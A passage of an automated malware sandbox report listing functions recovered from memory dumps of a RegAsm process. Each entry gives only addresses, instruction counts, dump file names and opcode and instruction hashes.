                                      • Instruction Fuzzy Hash: 7051A074E01218DFDB58DFA9D980AEDBBB2FF89300F208529E415AB354DB716946CF50
                                      Function 06605660 Relevance: .1, Instructions: 131COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: be78a59326afb4d70552618211caf2919ca87e99de32b3da396181eccdfaadba
                                      • Instruction ID: ec8cc34259bcc00a4389a5d8a08b6bab1675c39073580c0264712e0c6259357d
                                      • Opcode Fuzzy Hash: be78a59326afb4d70552618211caf2919ca87e99de32b3da396181eccdfaadba
                                      • Instruction Fuzzy Hash: CD4181357402059FEB08EF39C984B6ABBAAFFC8300F148469E5099B3A5CB71DC418B94
                                      Function 0666FB98 Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 76065b966b63f0964730aaf23c0bd0bde18b790be8afa7d06a223eca4920fbf9
                                      • Instruction ID: 6e7dbe31bd25f60381167a080bf5707bfa5a501b53e16759cb69ff9725b1299a
                                      • Opcode Fuzzy Hash: 76065b966b63f0964730aaf23c0bd0bde18b790be8afa7d06a223eca4920fbf9
                                      • Instruction Fuzzy Hash: 1251E474E01258CFDB54DFA9E954A9DBBF2FF89300F208129E409AB355DB305942CF51
                                      Function 06600EDA Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fe4f122ca359eec83d9afa0b05b6719cba3fb68f70a713861328f8127d7269c6
                                      • Instruction ID: 0c3f705f196ebbdf7ff38452088bca39b5d9b990696ac9e9511bc775bb032889
                                      • Opcode Fuzzy Hash: fe4f122ca359eec83d9afa0b05b6719cba3fb68f70a713861328f8127d7269c6
                                      • Instruction Fuzzy Hash: 2E41D531B042448FEF688B58D8587AFB7B9EF89314F10843AE906D73D0CA349C51C795
                                      Function 06664F08 Relevance: .1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cceffb027e990f0633e118ad70474b667426370661e81dbe31f7d86ab7533d8b
                                      • Instruction ID: 059433d8b4db06f13e1019ebe0591af0a61b35a42a58fd27e08e2831b3bccb80
                                      • Opcode Fuzzy Hash: cceffb027e990f0633e118ad70474b667426370661e81dbe31f7d86ab7533d8b
                                      • Instruction Fuzzy Hash: 3451E471E01209DFCB54CFAAD580A9EBBF2FF88314F14816AE419A7354DB359941CF91
                                      Function 066868F7 Relevance: .1, Instructions: 112COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6373e1bec9fcaf41f6ec147002f480f8875194b1a73a11a15cbfd2fe6273758d
                                      • Instruction ID: e71fd5ed8e83e007583f37c4421b2eabe015542b426e0fcdabb6c077a7878a3c
                                      • Opcode Fuzzy Hash: 6373e1bec9fcaf41f6ec147002f480f8875194b1a73a11a15cbfd2fe6273758d
                                      • Instruction Fuzzy Hash: 4551BB74E01218DFDB48DFA9D984ADDBBB2BF88304F10816AE815AB365DB309946CF50
                                      Function 0666A210 Relevance: .1, Instructions: 112COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c0417924b2378b924cb08b0ed4a89555585746b82521c5525dc9bdc61969f098
                                      • Instruction ID: d3312475cee642596b77353601940b088885407272aa55528d8583823016dcff
                                      • Opcode Fuzzy Hash: c0417924b2378b924cb08b0ed4a89555585746b82521c5525dc9bdc61969f098
                                      • Instruction Fuzzy Hash: 9941D674E00209DFDB48DFAAE484AEEBBB2FF88300F148565E915A7354DB31A955CF90
                                      Function 06680006 Relevance: .1, Instructions: 110COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d334942e3b8b3cbc751446db8d87efcab893dd11c50d3da8b320a9f1ad1a0463
                                      • Instruction ID: 121645a62fbbaf7ec99d816f7dc7382746f41d47dd7d67630105b2d7238fd09b
                                      • Opcode Fuzzy Hash: d334942e3b8b3cbc751446db8d87efcab893dd11c50d3da8b320a9f1ad1a0463
                                      • Instruction Fuzzy Hash: B8412774E042499FCB49DFAAC8849DEBFB2BF89310F14816AD454AB361DB305906CFA1
                                      Function 0666BB70 Relevance: .1, Instructions: 110COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 53bd6ba324055cb63b2525a5e45ead22d795879a35c104642c1da26b43663e4c
                                      • Instruction ID: 1e5de7f73653c9c5c8aac276b4acdc4f73f6bed5dd8b2dcc7c6d317e4af18862
                                      • Opcode Fuzzy Hash: 53bd6ba324055cb63b2525a5e45ead22d795879a35c104642c1da26b43663e4c
                                      • Instruction Fuzzy Hash: 04410674D0020ACFDB44DFA5D598AEEBBB2FF89301F108169D516A73A0DB349A46CF61
                                      Function 066886F7 Relevance: .1, Instructions: 108COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eaf537a07c52f1bc2b50d2a0bcd2550afaef4365dfd5160a5caab3efa10a3792
                                      • Instruction ID: 5da8b61be35b6061f66b56b79924a562568788742c06ae2fdeb13dc74dc31baa
                                      • Opcode Fuzzy Hash: eaf537a07c52f1bc2b50d2a0bcd2550afaef4365dfd5160a5caab3efa10a3792
                                      • Instruction Fuzzy Hash: 70417B34E05208DFCB54EFA8E8449DDBBF6EF49311F548269E804AB351C730AE46CBA1
                                      Function 0666BCB0 Relevance: .1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 042f95b1c341cb6d8514b18ece4b3af91ca17da9e7e6727d62c4d787ca5fe459
                                      • Instruction ID: 7850705afd027ce123f6cd63f18b62ecbad63f944957b731ccea76106734474b
                                      • Opcode Fuzzy Hash: 042f95b1c341cb6d8514b18ece4b3af91ca17da9e7e6727d62c4d787ca5fe459
                                      • Instruction Fuzzy Hash: 8B415C74E012199FCB44DFA9D984ADEFBF2BF48300F10816AE815A7365D734A946CFA0
                                      Function 0666BC9F Relevance: .1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ac55e6fd43fce1e39d485dc3dcd1da68fbb9a35ec16802036609b2d2baf20491
                                      • Instruction ID: 44d904bc83ce44026b979054c83ade1b68052a19519cdc6e4736d8b1ec9b9f01
                                      • Opcode Fuzzy Hash: ac55e6fd43fce1e39d485dc3dcd1da68fbb9a35ec16802036609b2d2baf20491
                                      • Instruction Fuzzy Hash: 3B417F74E012199FCB44DFA9D984ADEFBF2BF48300F10816AE815A7365D734A946CF60
                                      Function 0666F268 Relevance: .1, Instructions: 98COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fd8a9bbaa024c9150f590438594a97329921984c8a8880e96b5eb31d8a8ceac1
                                      • Instruction ID: bd4a5595e508e9e14edf425e6b2caf8f9db3ad445a29e233b09e04cf511ad63a
                                      • Opcode Fuzzy Hash: fd8a9bbaa024c9150f590438594a97329921984c8a8880e96b5eb31d8a8ceac1
                                      • Instruction Fuzzy Hash: 5B410774E01619CFDB54DFA6D854A9EBBF2BF89300F208069D809AB354DB705946CF92
                                      Function 06688737 Relevance: .1, Instructions: 95COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 99cf743b838f5141abca206bc97c510d3053bc7a3c0c2549201489f90abb718c
                                      • Instruction ID: ce3a4a9009784675828e55a070e1313bb403f5cfe24e62206afcde1ef9df61b6
                                      • Opcode Fuzzy Hash: 99cf743b838f5141abca206bc97c510d3053bc7a3c0c2549201489f90abb718c
                                      • Instruction Fuzzy Hash: 3B41BE74E002489FCB54DFA8D88499DBBF2FF89310F148169E805AB365DB35AD46CF50
                                      Function 0666D9F0 Relevance: .1, Instructions: 93COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6618d3328a39ac07ee2eb7a593bb9f36960da32cef6469eba80d747a27f64709
                                      • Instruction ID: 1fa44b27a075c2f8c7dbec825375f6137b4c663997363d1035d1762511601776
                                      • Opcode Fuzzy Hash: 6618d3328a39ac07ee2eb7a593bb9f36960da32cef6469eba80d747a27f64709
                                      • Instruction Fuzzy Hash: BF414A30E01208DFDB15CFA4D948AEEBBBAFF48301F54402AE512A6290CB399D45CFA0
                                      Function 06683CD9 Relevance: .1, Instructions: 89COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0be102152e6854b4f9c65cda5c406bfbed791ec38200bcc3255497e00237736f
                                      • Instruction ID: e230b42453fb659ea0923f5845ac47e2212ca661ebf46d78aaa468e64cf2023d
                                      • Opcode Fuzzy Hash: 0be102152e6854b4f9c65cda5c406bfbed791ec38200bcc3255497e00237736f
                                      • Instruction Fuzzy Hash: BE319375E01209AFCB44DFA9E490AEEBBF5FB49310F10812AE818B7354D7306945CFA5
                                      Function 06662858 Relevance: .1, Instructions: 89COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3bb43a6f713c222bde90b51ad4e2d21cbeb5d33d26ce465beee2f5fd5dafe2a1
                                      • Instruction ID: fc456b0d168acda93c4ace9668c33084623e0337a655d6a28a6ee9936b8ec570
                                      • Opcode Fuzzy Hash: 3bb43a6f713c222bde90b51ad4e2d21cbeb5d33d26ce465beee2f5fd5dafe2a1
                                      • Instruction Fuzzy Hash: 87318F74E05208EFCB51DFA5E9556ACBBF9EB49200F1484AAE804E3351DA345B45CBA2
                                      Function 0666BB80 Relevance: .1, Instructions: 88COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aa8e699646101070d6425d89305f9f0adbf252fe725126cfccfb3460e73358d6
                                      • Instruction ID: db47a3c76bed02d928334380576b722f66677c46f42feec101cef5691647e038
                                      • Opcode Fuzzy Hash: aa8e699646101070d6425d89305f9f0adbf252fe725126cfccfb3460e73358d6
                                      • Instruction Fuzzy Hash: AC41E574D0021ACFCB44DFA9D588AEEBBB2FF89311F108169E516A7360DB349946CF60
                                      Function 06664EF9 Relevance: .1, Instructions: 86COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0fc626d49e95b98cbfcf8f3fe5d4ce92a7356ef6443fb3e38b4d091b08f4c310
                                      • Instruction ID: c1f662aa1f9d6171746248b37b47858f21a69e105fc7fd31aa303042cba0f98d
                                      • Opcode Fuzzy Hash: 0fc626d49e95b98cbfcf8f3fe5d4ce92a7356ef6443fb3e38b4d091b08f4c310
                                      • Instruction Fuzzy Hash: F431F770E01209DFDB44DFAAD940A9EBBF2EF89304F14C06AE419AB364DB359941CF91
                                      Function 0666DA00 Relevance: .1, Instructions: 85COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 501e3644869831e6e257e0a8911d51003b0be4a8be51cc125ddfc6d0bdd80aee
                                      • Instruction ID: 6fd667d894517bba00701e0b23bd68df732728c35a951b3fb60ef2cb0a1b1c23
                                      • Opcode Fuzzy Hash: 501e3644869831e6e257e0a8911d51003b0be4a8be51cc125ddfc6d0bdd80aee
                                      • Instruction Fuzzy Hash: 0B310975E00208DFDB15CFA4E948AEEBBB7FF88305F544029E912A6290CB799D45CF90
                                      Function 06683CE8 Relevance: .1, Instructions: 82COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b8d39777e2dd2331bcb626b674562ee9b720265d34bf456f45f291829e34dbb9
                                      • Instruction ID: fce213c6d2e78564235f5fe7ecc9be767760831a5390c17a76fc37878761d6e9
                                      • Opcode Fuzzy Hash: b8d39777e2dd2331bcb626b674562ee9b720265d34bf456f45f291829e34dbb9
                                      • Instruction Fuzzy Hash: CC319374E01219AFCB44EFA9E480AEEBBF5FB48210F108129E818B7354D7306945CFA5
                                      Function 0668F298 Relevance: .1, Instructions: 78COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0bae85bf297d5e8650f07cbae373e2f6f6a0bffdd302183de7c9d782baf99238
                                      • Instruction ID: 685a341e67e7e250402906f51dc117a5efed9b3351c2c5cc6277d3eb85d3659b
                                      • Opcode Fuzzy Hash: 0bae85bf297d5e8650f07cbae373e2f6f6a0bffdd302183de7c9d782baf99238
                                      • Instruction Fuzzy Hash: B0113735A06200CFC748EF79D8549A9B7B6AF8B301F10B1A9D00577365CB72DC16CA98
                                      Function 066886C7 Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d4b7c0c2f0db4c83a8167fb8681d6e1098bc336c3aa9294d3e3ddc7b238e510e
                                      • Instruction ID: 2835a4f4b5f01320ea785eeaa15ab0f5c2ea6c14d21161e401028deb130475d3
                                      • Opcode Fuzzy Hash: d4b7c0c2f0db4c83a8167fb8681d6e1098bc336c3aa9294d3e3ddc7b238e510e
                                      • Instruction Fuzzy Hash: 81212A34A05248DFCB51DFA8E8849DDBBF5EF49314F54829AE804A7311C731AE42CFA1
                                      Function 06663A90 Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f49199baeba0aa0b74cb63cd87a54177105e98b180c0e8e8e8884dd9ba674d1
                                      • Instruction ID: 048254491f8ff84d37889e12582fa8fb12bd614b8baa2e22ccbf59ea3f8b168c
                                      • Opcode Fuzzy Hash: 4f49199baeba0aa0b74cb63cd87a54177105e98b180c0e8e8e8884dd9ba674d1
                                      • Instruction Fuzzy Hash: 9C31DA70E005099FDB44DFAED94099EF7F2FF8C200B55C5A5D418AB329E730AA45CB91
                                      Function 0666A691 Relevance: .1, Instructions: 74COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 97bc4bb0e4151ac7b4321f45e3ef583b47edf9bfe28c38414ba490ce92438023
                                      • Instruction ID: f2e649cfd750cc4518c87c013991442f230f2354283d0e05ffeefe19be059cd2
                                      • Opcode Fuzzy Hash: 97bc4bb0e4151ac7b4321f45e3ef583b47edf9bfe28c38414ba490ce92438023
                                      • Instruction Fuzzy Hash: 2A31F679E00219DFDB40DFA9D444AEEBBF5FF89320F008026E905A7344DB359A91CBA1
                                      Function 012ED0EC Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2653905578.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_12ed000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f223e2e720fec016b1a6e43bb930f76590d5a6f554450902fd619600db995a97
                                      • Instruction ID: 36a9a1dba4c5b1803a304ff02f43ae1c9387fd05f623e5b9c778d87c828c42ae
                                      • Opcode Fuzzy Hash: f223e2e720fec016b1a6e43bb930f76590d5a6f554450902fd619600db995a97
                                      • Instruction Fuzzy Hash: 62213475550208EFDB05DF58C9C8B26BBA1EB84314F60C56DD9094F256C376D446CAA1
                                      Function 066607A0 Relevance: .1, Instructions: 71COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7cf8e0b1a7391994ad793de16d5cf7d1ee14c1a87c5d460758c76c13a1b560df
                                      • Instruction ID: 026c8b3ade90c95e78693f20fd16eb347ab05d915f1b1cb4c623c3fdd8e1f6f5
                                      • Opcode Fuzzy Hash: 7cf8e0b1a7391994ad793de16d5cf7d1ee14c1a87c5d460758c76c13a1b560df
                                      • Instruction Fuzzy Hash: 6D21FC75E06218ABDB44CFAAE940ADDBBF6BF89300F14916AE408B7355DB305906CB54
                                      Function 0668F2A8 Relevance: .1, Instructions: 70COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 21c90e2b72d5c1fff6e8d10eebc56f1b4a1de9fe60841279169cf88c09188dcb
                                      • Instruction ID: eb0a54703eb7059514eab730d6bfc8d0a02dd57d66463f9ce1c46d78e6903bd4
                                      • Opcode Fuzzy Hash: 21c90e2b72d5c1fff6e8d10eebc56f1b4a1de9fe60841279169cf88c09188dcb
                                      • Instruction Fuzzy Hash: 80113631E06204CFC748EF7AD5508A9B7B6EF8B301F50A1A9D405AB365CB71DC12CA58
                                      Function 066031CA Relevance: .1, Instructions: 70COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b2391f59c35556af9c64fa65fbbc1231a613e0600bea9a60b227bb0b51b036f2
                                      • Instruction ID: afd5dc3b7d6a7282213126f6908acfebe3bf45af4d5bfbce0d64c7ee81fb119d
                                      • Opcode Fuzzy Hash: b2391f59c35556af9c64fa65fbbc1231a613e0600bea9a60b227bb0b51b036f2
                                      • Instruction Fuzzy Hash: 8D21AC34B101049FCB44DB69D4589AEBBF6FFCD220B5440A9E506EB3A5CA32EC058BA1
                                      Function 06603298 Relevance: .1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 43ea64e8f0bc62d913bcfc193fff13eafc95139b5f6e3ac7856cf10fdff53340
                                      • Instruction ID: 5117ef9afb12133242a4a60a6256ce4be975a08f5e5e7fe3a8c027a8d607d00d
                                      • Opcode Fuzzy Hash: 43ea64e8f0bc62d913bcfc193fff13eafc95139b5f6e3ac7856cf10fdff53340
                                      • Instruction Fuzzy Hash: 05116035F002469FEB989B78D8846EF7BA1EB88761F144439D505E7384DB318D1587D0
                                      Function 06688768 Relevance: .1, Instructions: 66COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0860ecddb23405045ba5fa418c8cb80776a9400e633ead0abc21552d458b2409
                                      • Instruction ID: d4cf00d7e1b753ca6e0eae38af927d69c8e0dd74aad2bca608700a65397fb5c9
                                      • Opcode Fuzzy Hash: 0860ecddb23405045ba5fa418c8cb80776a9400e633ead0abc21552d458b2409
                                      • Instruction Fuzzy Hash: 3421E534E012189FCB54DFA9D8849DDBBF6FF88311F149169E814A7314D771A946CF90
                                      Function 066652C0 Relevance: .1, Instructions: 66COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 76cea647e182cc516c001e5c5345df8c1dd99b061d31b46fd037abb8b609d856
                                      • Instruction ID: f4804fe159d5c56981da184cd8939b619ccd395278cee5312911a027a111e2bb
                                      • Opcode Fuzzy Hash: 76cea647e182cc516c001e5c5345df8c1dd99b061d31b46fd037abb8b609d856
                                      • Instruction Fuzzy Hash: DF119436704204AFC711CB59F805DCABFFAEB857607048096F545DB261E772DA01CBA0
                                      Function 066031D8 Relevance: .1, Instructions: 62COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c1dad3606df32ddcf90ca58f40d47cb1bd5ad39e65dd559386cc6f5d80144fcd
                                      • Instruction ID: a8b2e97d92ac6471be56fab39862889064c67d0858dc83dbb3db1898e6eb3f8c
                                      • Opcode Fuzzy Hash: c1dad3606df32ddcf90ca58f40d47cb1bd5ad39e65dd559386cc6f5d80144fcd
                                      • Instruction Fuzzy Hash: 8711BC34B100048FCB44EB78D45896EBBF6FF8D620B5440A9E106EB3B5CE32EC058B91
                                      Function 06663E29 Relevance: .1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 10daee99a22a2d672a79da2606eed45ef4c13069309ee8885d2553339ba515dd
                                      • Instruction ID: 4c5b6db916f612e76abbf4049d9c7f3247ac4047ea6e0d1a92c7dc31b577a479
                                      • Opcode Fuzzy Hash: 10daee99a22a2d672a79da2606eed45ef4c13069309ee8885d2553339ba515dd
                                      • Instruction Fuzzy Hash: 60218174E00209EFCB44EFA4D544AAEBBB2FF85301F1085A9D405A7351DB705E45DF91
                                      Function 066032A8 Relevance: .1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
